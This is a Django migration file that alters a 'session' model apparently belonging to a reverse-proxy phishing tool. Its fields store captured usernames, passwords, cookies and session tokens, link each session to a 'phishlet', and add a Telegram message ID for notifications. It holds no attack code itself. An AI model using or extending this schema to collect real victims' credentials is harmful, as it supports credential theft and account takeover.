# Generated by Django 5.2.5 on 2025-08-14 17:58

import django.db.models.deletion
import django.utils.timezone
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('core', '0012_notificationsettings'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='session',
            options={'ordering': ['-created']},
        ),
        migrations.AddField(
            model_name='session',
            name='telegram_message_id',
            field=models.BigIntegerField(blank=True, help_text='Telegram message ID for notifications', null=True),
        ),
        migrations.AlterField(
            model_name='session',
            name='captured_cookies',
            field=models.JSONField(blank=True, default=dict, help_text='Cookies captured from the session'),
        ),
        migrations.AlterField(
            model_name='session',
            name='captured_custom',
            field=models.JSONField(blank=True, default=dict, help_text='Custom data captured from the session'),
        ),
        migrations.AlterField(
            model_name='session',
            name='captured_password',
            field=models.CharField(blank=True, help_text='Password captured from the session', max_length=255),
        ),
        migrations.AlterField(
            model_name='session',
            name='captured_username',
            field=models.CharField(blank=True, help_text='Username captured from the session', max_length=255),
        ),
        migrations.AlterField(
            model_name='session',
            name='created',
            field=models.DateTimeField(default=django.utils.timezone.now, editable=False),
        ),
        migrations.AlterField(
            model_name='session',
            name='is_active',
            field=models.BooleanField(default=True, help_text='Whether this session is active'),
        ),
        migrations.AlterField(
            model_name='session',
            name='is_captured',
            field=models.BooleanField(default=False, help_text='Whether this session has captured data'),
        ),
        migrations.AlterField(
            model_name='session',
            name='is_proxy_auth',
            field=models.BooleanField(default=False, help_text='Whether this session used proxy authentication'),
        ),
        migrations.AlterField(
            model_name='session',
            name='phishlet',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sessions', to='core.phishlet'),
        ),
        migrations.AlterField(
            model_name='session',
            name='proxy_domain',
            field=models.CharField(blank=True, help_text='Proxy domain used for this session', max_length=255),
        ),
        migrations.AlterField(
            model_name='session',
            name='session_cookie',
            field=models.CharField(blank=True, help_text='Session cookie value', max_length=255),
        ),
        migrations.AlterField(
            model_name='session',
            name='updated',
            field=models.DateTimeField(auto_now=True),
        ),
    ]
